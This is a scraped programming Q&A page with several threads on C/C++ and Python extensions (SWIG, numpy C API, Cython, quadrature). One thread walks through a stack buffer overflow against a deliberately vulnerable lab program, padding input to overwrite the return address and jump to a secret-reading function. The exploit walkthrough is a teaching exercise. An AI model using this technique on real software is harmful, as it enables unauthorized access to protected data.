SWIG C++ vector access in Python

This may be a noob question, but here it goes. I have wrapped a 3D vector in a Python module using SWIG. Everything compiles, and I can import the module and call its methods. What I can't figure out is how to access the vector from Python to store and change its values. How do I do that? The code below was written to test whether the STL <algorithm> functions work through SWIG. They do seem to work, but I need to be able to put values into my vector from Python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED

#include <vector>

using namespace std;

struct myStruct {
    int vecd1, vecd2, vecd3;
    vector<vector<vector<double> > > vec3d;
    void vecSizer();
    void deleteDuplicates();
    double vecSize();
    void run();
};

#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
vec3d.resize(vecd1);
for(int i = 0; i < vec3d.size(); i++)
{
vec3d[i].resize(vecd2);
for(int j = 0; j < vec3d[i].size(); j++)
{
vec3d[i][j].resize(vecd3);
}
}
}
void myStruct::deleteDuplicates()
{
vector<vector<vector<double> > >::iterator it;
sort(vec3d.begin(),vec3d.end());
it = unique(vec3d.begin(),vec3d.end());
vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
return vec3d.size();
}
void myStruct::run()
{
vecSizer();
deleteDuplicates();
vecSize();
}
From the terminal (Ubuntu):
>>> import test           # import the SWIG-generated module
>>> x = test.myStruct()   # create an instance of myStruct
>>> x.vecSize()           # should be 0 since the vector dimensions are not initialized
0.0
>>> x.vec3d               # check that vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!

It turns out that the vectors are converted to immutable Python objects when the wrapper/interface is generated: vec3d shows up only as an opaque SWIG pointer object. So, in short, you cannot modify the wrapped C++ vectors directly from Python.
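If you only need to get values in and out, one workaround (a sketch, assuming you can edit header.h; the method names getValue/setValue are made up here) is to add small accessor methods to myStruct, since SWIG wraps ordinary member functions that take and return doubles without any extra typemaps:
// hypothetical accessors added inside struct myStruct in header.h so that
// Python can read and write individual entries without touching vec3d directly
double getValue(int i, int j, int k) { return vec3d[i][j][k]; }
void setValue(int i, int j, int k, double value) { vec3d[i][j][k] = value; }
SWIG also ships std_vector.i typemaps that can expose vectors as Python sequences, but wiring them up for a triply nested vector takes extra %template declarations, so plain accessors are usually the simpler route.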

Related

PyImport_Import segmentation fault after reading in TSV with C++

I am using C++ as a wrapper around a Python module. First, I read in a TSV file, cast it as a numpy array, import my Python module, and then pass the numpy array to Python for further analysis. When I first wrote the program, I was testing everything using a randomly generated array, and it worked well. However, once I replaced the randomly generated array with the imported TSV array, I got a segmentation fault when I tried to import the Python module. Here is some of my code:
#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION
#define PY_SSIZE_T_CLEAN
#include <python3.8/Python.h>
#include "./venv/lib/python3.8/site-packages/numpy/core/include/numpy/arrayobject.h"
#include <stdio.h>
#include <iostream>
#include <stdlib.h>
#include <random>
#include <fstream>
#include <sstream>

int main(int argc, char* argv[]) {
    setenv("PYTHONPATH", ".", 0);
    Py_Initialize();
    import_array();

    static const int numberRows = 1000;
    static const int numberColumns = 500;
    npy_intp dims[2]{ numberRows, numberColumns };
    static const int numberDims = 2;
    double(*c_arr)[numberColumns]{ new double[numberRows][numberColumns] };

    // ***********************************************************
    // THIS PART OF THE CODE GENERATES A RANDOM ARRAY AND WORKS WITH THE REST OF THE CODE
    // // initialize random number generation
    // typedef std::mt19937 MyRNG;
    // std::random_device r;
    // MyRNG rng{r()};
    // std::lognormal_distribution<double> lognormalDistribution(1.6, 0.25);
    // // populate array
    // for (int i=0; i < numberRows; i++) {
    //     for (int j=0; j < numberColumns; j++) {
    //         c_arr[i][j] = lognormalDistribution(rng);
    //     }
    // }
    // ***********************************************************

    // ***********************************************************
    // THIS PART OF THE CODE INGESTS AN ARRAY FROM TSV AND CAUSES CODE TO FAIL AT PyImport_Import
    std::ifstream data("data.mat");
    std::string line;
    int row = 0;
    int column = 0;
    while (std::getline(data, line)) {
        std::stringstream lineStream(line);
        std::string cell;
        while (std::getline(lineStream, cell, '\t')) {
            c_arr[row][column] = std::stod(cell);
            column++;
        }
        row++;
        column = 0;
        if (row > numberRows) {
            break;
        }
    }
    // ***********************************************************

    PyArrayObject *npArray = reinterpret_cast<PyArrayObject*>(
        PyArray_SimpleNewFromData(numberDims, dims, NPY_DOUBLE, reinterpret_cast<void*>(c_arr))
    );
    const char *moduleName = "cpp_test";
    PyObject *pname = PyUnicode_FromString(moduleName);

    // ***********************************************************
    // CODE FAILS HERE - SEGMENTATION FAULT
    PyObject *pyModule = PyImport_Import(pname);
    // .......
    // THERE IS MORE CODE BELOW NOT INCLUDED HERE
}
So I'm not sure why the code fails when ingesting data from a TSV file, but not when I use randomly generated data.
EDIT: (very stupid mistake incoming) I used row > numberRows as the stopping condition in the while loop, so the loop wrote one row past the end of the array before it stopped. Once I changed that condition to row == numberRows, everything worked. Who knew being precise about rows when building an array was so important? I'll leave this up as a testament to stupid programming mistakes, and maybe someone will learn a little something from it.
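For illustration, here is a rough sketch of the same read loop with the bounds check moved to the top (and a matching guard on the columns), so a write can never land past the end of c_arr:
// sketch of the corrected ingestion loop: check the row index before writing
while (std::getline(data, line)) {
    if (row >= numberRows) {
        break;                      // stop before writing past the last row
    }
    std::stringstream lineStream(line);
    std::string cell;
    column = 0;
    while (std::getline(lineStream, cell, '\t') && column < numberColumns) {
        c_arr[row][column] = std::stod(cell);
        column++;
    }
    row++;
}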
Note that you don't have to use built-in arrays for storing the information (like double values) in a 2D manner; you can also use dynamically sized containers like std::vector, as shown below. The advantage of std::vector is that you don't need to know the number of rows and columns in your input file (data.mat) beforehand, so you don't have to pre-allocate memory for them; you can add the values dynamically.
#include <iostream>
#include <vector>
#include <string>
#include <sstream>
#include <fstream>

int main() {
    std::string line;
    double word;
    std::ifstream inFile("data.mat");

    // create/use a std::vector instead of a built-in array
    std::vector<std::vector<double>> vec;

    if (inFile)
    {
        while (getline(inFile, line, '\n'))
        {
            // create a temporary vector that will contain all the columns
            std::vector<double> tempVec;
            std::istringstream ss(line);

            // read word by word (or double by double)
            while (ss >> word)
            {
                //std::cout << "word:" << word << std::endl;
                // add the word to the temporary vector
                tempVec.push_back(word);
            }
            // now all the words from the current line have been added to the temporary vector
            vec.emplace_back(tempVec);
        }
    }
    else
    {
        std::cout << "file cannot be opened" << std::endl;
    }
    inFile.close();

    // let's check the elements of the 2D vector so we can confirm it contains all the right elements (rows and columns)
    for (const std::vector<double> &newvec : vec)
    {
        for (const double &elem : newvec)
        {
            std::cout << elem << " ";
        }
        std::cout << std::endl;
    }
    return 0;
}
The output of the above program can be seen here. Since you didn't provide a data.mat file, I created an example data.mat file and used it in my program; it can be found at the above-mentioned link.

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program, which has a buffer overflow vulnerability, to get it to return the secret stored in a protected .txt file (via read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void read_secret() {
    FILE *fptr = fopen("/task2/secret.txt", "r");
    char secret[1024];
    fscanf(fptr, "%512s", secret);
    printf("Well done!\nThere you go, a wee reward: %s\n", secret);
    exit(0);
}

int fib(int n)
{
    if ( n == 0 )
        return 0;
    else if ( n == 1 )
        return 1;
    else
        return ( fib(n-1) + fib(n-2) );
}

void vuln(char *name)
{
    int n = 20;
    char buf[1024];
    int f[n];
    int i;
    for (i=0; i<n; i++) {
        f[i] = fib(i);
    }
    strcpy(buf, name);
    printf("Welcome %s!\n", buf);
    for (i=0; i<20; i++) {
        printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
    }
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Tell me your names, tricksy hobbitses!\n");
        return 0;
    }
    // printf("main function at %p\n", main);
    // printf("read_secret function at %p\n", read_secret);
    vuln(argv[1]);
    return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that vuln returns to read_secret instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the saved return address (which points back into main) with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you can get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved EIP (the return address, which tells the program what to execute next) and put your own target address in its place.
To redirect execution you need to know the address of the target function, so open your program in gdb and type in:
x read_secret
Then copy the address. You then have to convert it to little-endian (or big-endian, depending on the architecture) byte order. I do it with the struct module in Python.
import struct
struct.pack("<I", address)  # "<I" packs little endian; use ">I" for big endian
Then you have to append it to your input to the binary, so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
# on a bash shell, not in the script
If all of this doesn't work, just add a few more characters to your offset; there might be something you didn't see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Cython macro definition in structure

I'm using Cython to expose a C structure to Python, but the structure contains some macro definitions, including function-like macros. I just don't know how to express this structure in Cython.
typedef struct _SparMat {
    int m, n;
    int *rvec;
    int *ridx;
    double *rval;
    int *cvec;
    int *cidx;
    double *cval;
    int nnz;
    int bufsz;
    int incsz;
    int flag;
#define MAT_ROWBASE_INDEX (0x00000001)
#define MAT_ROWBASE_VALUE (0x00000002)
#define MAT_COLBASE_INDEX (0x00000004)
#define MAT_COLBASE_VALUE (0x00000008)
#define CSR_INDEX(flag) ((flag) & MAT_ROWBASE_INDEX)
#define CSR_VALUE(flag) ((flag) & MAT_ROWBASE_VALUE)
#define CSC_INDEX(flag) ((flag) & MAT_COLBASE_INDEX)
#define CSC_VALUE(flag) ((flag) & MAT_COLBASE_VALUE)
} SparMat, *matptr;

Equivalent of python lambda function for C (Python Extensions)

I've written a Python extension module in C to speed up computation times. The first step is a 2D integration of a function f(x,y,k), which is very fast and lets me integrate over y in [y1(x),y2(x)] and x in [a,b] while assigning a float to k. But I really need to integrate k over the range [c,d] as well. Currently, I'm doing something like this in Python:
inner = lambda k: calc.kernel(l,k,ki)
I = quad(inner,c,d)[0]
where calc is my C-extension module and calc.kernel calls gauss2 to perform the 2D integration. l and ki are just other variables. But with my data, quad still takes many hours to finish. I would like to do all calculations within the C-extension module, but I'm really stumped on how to implement this outer integral. Here is my C code:
#include <Python.h>
#include <math.h>

double A96[96]={ /* abscissas for 96-point Gauss quadrature */
};
double W96[96]={ /* weights for 96-point Gauss quadrature */
};

double Y1(double x){
    return 0;
}

double Y2(double x){
    return x;
}

double gauss1(double F(double), double a, double b)
{ /* 96-pt Gauss quadrature integrates F(x) from a to b */
    int i;
    double cx,dx,q;
    cx=(a+b)/2;
    dx=(b-a)/2;
    q=0;
    for(i=0;i<48;i++)
        q+=W96[i]*(F(cx-dx*A96[i])+F(cx+dx*A96[i]));
    return(q*dx);
}

double gauss2(double F(double,double,int,double,double), double Y1(double), double Y2(double), double a, double b, int l, double k, double ki)
{ /* 96x96-pt 2-D Gauss quadrature integrates
     F(x,y) from y=Y1(x) to Y2(x) and x=a to b */
    int i,j,h;
    double cx,cy,dx,dy,q,w,x,y1,y2;
    cx=(a+b)/2;
    dx=(b-a)/2;
    q=0;
    for(i=0;i<48;i++)
    {
        for(h=-1;h<=1;h+=2)
        {
            x=cx+h*dx*A96[i];
            y1=Y1(x);
            y2=Y2(x);
            cy=(y1+y2)/2;
            dy=(y2-y1)/2;
            w=dy*W96[i];
            for(j=0;j<48;j++)
                q+=w*W96[j]*(F(x,cy-dy*A96[j],l,k,ki)+F(x,cy+dy*A96[j],l,k,ki));
        }
    }
    return(q*dx);
}

double ps_fact(double z){
    double M = 0.3;
    return 3/2*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))/(1+z)/(1+z);
}

double drdz(double z){
    double M = 0.3;
    return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}

double rInt(double z){
    double M = 0.3;
    return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}

double kernel_func(double y, double x, int l, double k, double ki) {
    return ps_fact(y)*ki*rInt(x)*sqrt(M_PI/2/rInt(x))*jn(l+0.5,ki*rInt(x))*drdz(x)*(rInt(x)-rInt(y))/rInt(y)*sqrt(M_PI/2/rInt(y))*jn(l+0.5,k*rInt(y))*drdz(y);
}

static PyObject* calc(PyObject* self, PyObject* args)
{
    int l;
    double k, ki;
    if (!PyArg_ParseTuple(args, "idd", &l, &k, &ki))
        return NULL;
    double res;
    res = gauss2(kernel_func, Y1, Y2, 0, 10, l, k, ki);
    return Py_BuildValue("d", res);
}

static PyMethodDef CalcMethods[] = {
    {"kernel", calc, METH_VARARGS, "Calculates kernel values."},
    {NULL, NULL, 0, NULL}
};

PyMODINIT_FUNC initcalc(void){
    (void) Py_InitModule("calc", CalcMethods);
}
A96 and W96 both contain the points for the Gaussian quadrature, so don't worry that they are empty here. I should add I don't take any credit for the functions gauss1 and gauss2.
EDIT: python code was wrong - edited now.
Maybe the source code for scipy.integrate.quad is a good place to start if you haven't looked there: https://github.com/scipy/scipy/blob/v0.17.0/scipy/integrate/quadpack.py#L45-L360
It looks like most of the work is already being done by native Fortran code, which is normally as fast as or faster than C/C++ code. You will be hard pressed to improve on that unless you create or find a CUDA implementation.
You could make the Fortran code multithreaded, if it isn't already and the source is open. Lastly, you could write a threading dispatcher in C/Fortran (Python doesn't support real threading because of the GIL) and at least make your calls to quad run in parallel with one another. Interfacing calc directly with the Fortran quad routine would probably save you some decent overhead too.
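Alternatively, if the goal is to keep everything inside the extension, here is a rough sketch (not from the original post) of how the outer k-integration could reuse the existing gauss1 routine. Since gauss1 only accepts a one-argument function, l and ki are passed through file-scope variables; the names g_l, g_ki, outer_integrand, and calc_full are made up for illustration:
/* hypothetical: integrate the kernel over k in [c, d] entirely in C by
   nesting gauss2 (the 2-D integral) inside gauss1 (the 1-D rule) */
static int g_l;       /* stashed here because gauss1 takes F(double) only */
static double g_ki;

static double outer_integrand(double k)
{
    return gauss2(kernel_func, Y1, Y2, 0, 10, g_l, k, g_ki);
}

static PyObject* calc_full(PyObject* self, PyObject* args)
{
    double c, d;
    if (!PyArg_ParseTuple(args, "iddd", &g_l, &g_ki, &c, &d))
        return NULL;
    return Py_BuildValue("d", gauss1(outer_integrand, c, d));
}

/* would also need an entry such as
   {"kernel_full", calc_full, METH_VARARGS, "Integrates the kernel over k."}
   in CalcMethods */
This trades quad's adaptive error control for a fixed 96-point rule, so it is only worth doing if that accuracy is acceptable for the k integral.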

creating numpy array in c extension segfaults

I'm just trying to start off by creating a numpy array before I even start to write my extension. Here is a super simple program:
#include <stdio.h>
#include <iostream>
#include "Python.h"
#include "numpy/npy_common.h"
#include "numpy/ndarrayobject.h"
#include "numpy/arrayobject.h"

int main(int argc, char * argv[])
{
    int n = 2;
    int nd = 1;
    npy_intp size = {1};
    PyObject* alpha = PyArray_SimpleNew(nd, &size, NPY_DOUBLE);
    return 0;
}
This program segfaults on the PyArray_SimpleNew call and I don't understand why. I'm trying to follow some previous questions (e.g. numpy array C api and C array to PyArray). What am I doing wrong?
Typical usage of PyArray_SimpleNew is for example
int nd = 2;
npy_intp dims[] = {3,2};
PyObject *alpha = PyArray_SimpleNew(nd, dims, NPY_DOUBLE);
Note that the value of nd must not exceed the number of elements of array dims[].
ALSO: The extension must call import_array() to set up the C API's function-pointer table. E.g. in Cython:
import numpy as np
cimport numpy as np

np.import_array()  # so numpy's C API won't segfault

cdef make_array():
    cdef np.npy_intp element_count = 100
    return np.PyArray_SimpleNew(1, &element_count, np.NPY_DOUBLE)
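The same requirement applies to the standalone program in the question: it never starts the interpreter or initializes NumPy's C API before calling PyArray_SimpleNew. A minimal sketch of a version that should not segfault (a sketch, not a drop-in fix; import_array1(-1) is the variant of import_array() meant for functions that return int):
#include "Python.h"
#include "numpy/arrayobject.h"

int main(int argc, char * argv[])
{
    Py_Initialize();      // start the embedded interpreter first
    import_array1(-1);    // set up NumPy's C API function-pointer table

    npy_intp dims[] = {3, 2};
    PyObject* alpha = PyArray_SimpleNew(2, dims, NPY_DOUBLE);
    if (alpha == NULL)
        return -1;

    Py_DECREF(alpha);
    Py_Finalize();
    return 0;
}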
